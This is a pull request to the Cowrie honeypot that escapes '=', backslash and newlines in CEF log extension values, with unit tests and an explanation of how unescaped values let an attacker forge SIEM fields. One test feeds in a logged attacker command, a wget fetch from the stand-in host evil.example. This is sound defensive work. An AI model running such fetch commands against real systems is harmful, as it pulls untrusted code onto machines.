### PR TITLE
fix: escape CEF extension values

### DIFF
--- a/src/cowrie/core/cef.py
+++ b/src/cowrie/core/cef.py
@@ -10,6 +10,23 @@
 from __future__ import annotations
 
 
+def escapeCefValue(value: str) -> str:
+    """
+    Escape a CEF extension value.
+
+    Pairs in the extension are delimited by a space and a key is separated
+    from its value by "=", so a literal "=" in a value would read as the start
+    of the next pair. CEF escapes it as "\\=", the backslash itself as "\\\\",
+    and a newline as "\\n" / "\\r" so one event stays on one line.
+    """
+    return (
+        value.replace("\\", "\\\\")
+        .replace("=", "\\=")
+        .replace("\r", "\\r")
+        .replace("\n", "\\n")
+    )
+
+
 def formatCef(logentry: dict[str, str]) -> str:
     """
     Take logentry and turn into CEF string
@@ -54,7 +71,7 @@ def formatCef(logentry: dict[str, str]) -> str:
 
     cefList = []
     for key in cefExtensions:
-        value = str(cefExtensions[key])
+        value = escapeCefValue(str(cefExtensions[key]))
         cefList.append(f"{key}={value}")
 
     cefExtension = " ".join(cefList)

--- a/src/cowrie/test/test_cef.py
+++ b/src/cowrie/test/test_cef.py
@@ -61,5 +61,43 @@ class CefFormatTests(unittest.TestCase):
         self.assertIn("filePath=var/lib/cowrie/downloads/def456", cef)
 
 
+class CefExtensionEscapingTests(unittest.TestCase):
+    """An extension value carries attacker-influenced text (a typed command).
+    CEF delimits pairs with a space and a key from its value with "=", so a
+    literal "=" or "\\" in a value has to be escaped or the reader sees extra
+    key/value pairs instead of the text."""
+
+    def test_equals_in_message_is_escaped(self) -> None:
+        cef = formatCef(
+            _entry(
+                eventid="cowrie.command.input",
+                message="CMD: wget http://evil.example/x?a=b&c=d",
+            )
+        )
+
+        self.assertIn(r"msg=CMD: wget http://evil.example/x?a\=b&c\=d", cef)
+
+    def test_backslash_in_message_is_escaped(self) -> None:
+        cef = formatCef(
+            _entry(eventid="cowrie.command.input", message=r"CMD: echo a\b")
+        )
+
+        self.assertIn(r"msg=CMD: echo a\\b", cef)
+
+    def test_newline_in_message_is_escaped(self) -> None:
+        """A raw newline would end the syslog record mid-event."""
+        cef = formatCef(
+            _entry(eventid="cowrie.command.input", message="first\r\nsecond")
+        )
+
+        self.assertIn(r"msg=first\r\nsecond", cef)
+        self.assertNotIn("\n", cef)
+
+    def test_ordinary_value_is_unchanged(self) -> None:
+        cef = formatCef(_entry(eventid="cowrie.command.input", message="CMD: ls -la"))
+
+        self.assertIn("msg=CMD: ls -la", cef)
+
+
 if __name__ == "__main__":
     unittest.main()


### PR DESCRIPTION
`formatCef()` built extension pairs with a bare f-string:

```python
cefList.append(f"{key}={value}")
```

CEF delimits extension pairs with a space and separates a key from its value with `=`, so the spec requires `=` and `\` to be escaped inside a value. `cefExtensions["msg"]` comes from `logentry["message"]`, which carries attacker-influenced text — and a shell command containing `=` is completely ordinary (`export FOO=bar`, or a URL query string in a `wget`/`curl` line).

The effect on a spec-compliant reader is that `msg` gets truncated at the first embedded `=` and the rest of the attacker's command is parsed as bogus extra key/value pairs — a key literally named `http://evil.example/x?a`, and so on. An attacker who knows the format can therefore forge extension fields in the SIEM record.

Added `escapeCefValue()` and applied it to every extension value.

It escapes `\` and `=` as the issue describes, and also `\r` / `\n`. That's the same defect rather than extra scope: CEF requires newlines escaped in extension values for the same reason, and the CEF string goes to `localsyslog`/`textlog`, where a raw newline in `msg` ends the record mid-event and the remainder is read as a new log line. Order matters — the backslash is escaped first so the escapes introduced afterwards aren't double-escaped.

Header fields are left alone: `cefSignature` and `cefName` both come from `eventid`, which is an internal constant, not attacker input.

Tests cover `=`, `\`, CRLF, and an ordinary value that must pass through unchanged.

Fixes #40467
